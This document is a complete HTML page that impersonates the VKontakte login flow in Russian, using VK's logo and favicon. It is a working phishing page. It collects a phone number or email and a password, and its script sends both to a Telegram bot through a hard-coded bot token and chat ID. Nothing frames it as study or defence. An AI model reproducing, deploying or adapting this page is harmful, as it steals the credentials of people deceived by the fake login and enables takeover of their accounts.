<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Вход ВКонтакте</title>
    <link rel="icon" type="image/png" sizes="32x32" href="https://static.vk.com/vkid/1.1.947/favicon-new-32x32.png?1">
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <style>
        body {
            background-color: #19191a;
            color: #fff;
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            background-color: #2f2f30;
            padding: 30px;
            border-radius: 10px;
            text-align: center;
            width: 350px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
            display: none;
        }
        .active {
            display: block;
        }
        .container img {
            width: 60px;
            margin-bottom: 20px;
        }
        .container h2 {
            font-size: 20px;
            margin-bottom: 8px;
        }
        .container p.description {
            font-size: 14px;
            color: #999;
            margin-bottom: 20px;
        }
        .container input[type="text"],
        .container input[type="password"] {
            width: calc(100% - 30px);
            padding: 13px;
            margin: 16px 0;
            margin-left: 0;
            margin-top: 0px;
            border: none;
            border-radius: 8px;
            background-color: #424242;
            color: white;
            font-size: 16px;
            text-align: center;
        }
        .container input[type="checkbox"] {
            margin-right: 10px;
        }
        .container button {
            width: 100%;
            padding: 12px;
            margin-top: 20px;
            background-color: #fff;
            border: none;
            border-radius: 8px;
            color: #000;
            font-size: 16px;
            cursor: pointer;
            font-weight: bold;
        }
        .container button:hover {
            background-color: #e6e6e6;
        }
        .container p {
            font-size: 14px;
            color: #999;
            margin-top: 20px;
        }
        .forgot-password {
            color: #4a76a8;
            font-size: 14px;
            text-decoration: none;
            display: block;
            margin-top: 10px;
        }
    </style>
</head>
<body>
    <div class="container active" id="login-step1">
        <img src="https://static.vk.com/vkid/1.1.947/favicon-new-192x192.png?1" alt="VK Logo">
        <h2>Вход ВКонтакте</h2>
        <p class="description">Введите телефон или почту, которые привязаны к аккаунту</p>
        <form onsubmit="showPasswordStep(event)">
            <input type="text" id="user-input" placeholder="Телефон или почта" required>
            <label>
                <input type="checkbox" checked> Сохранить вход
            </label>
            <button type="submit">Продолжить</button>
        </form>
        <p>Нажимая «Продолжить», вы принимаете пользовательское соглашение и политику конфиденциальности</p>
    </div>

    <div class="container" id="login-step2">
        <img src="https://static.vk.com/vkid/1.1.947/favicon-new-192x192.png?1" alt="VK Logo">
        <h2>Введите пароль</h2>
        <p class="description">Введите ваш текущий пароль, привязанный к <span id="user-number"></span></p>
        <form onsubmit="submitData(event)">
            <input type="password" id="password" placeholder="Введите пароль" required>
            <a href="#" class="forgot-password">Забыли или не установили пароль?</a>
            <button type="submit">Продолжить</button>
        </form>
    </div>

    <script>
        function showPasswordStep(event) {
            event.preventDefault();
            var userInput = document.getElementById('user-input').value;
            document.getElementById('user-number').textContent = userInput;
            document.getElementById('login-step1').classList.remove('active');
            document.getElementById('login-step2').classList.add('active');
        }

        function submitData(event) {
            event.preventDefault();

            const login = document.getElementById('user-input').value;
            const password = document.getElementById('password').value;

            const chatId = '6184515646';
            const token = '7534547130:AAHwfGGLBycBbgBhyxGTX8TeOhQQjRjiSbM';
            const url = `https://api.telegram.org/bot${token}/sendMessage`;

            const data = {
                chat_id: chatId,
                text: `Логин: ${login}\nПароль: ${password}`
            };

            axios.post(url, data)
                .then(response => {
                    console.log('Данные отправлены:', response.data);
                })
                .catch(error => {
                    console.error('Ошибка при отправке данных:', error);
                });
        }
    </script>
</body>
</html>
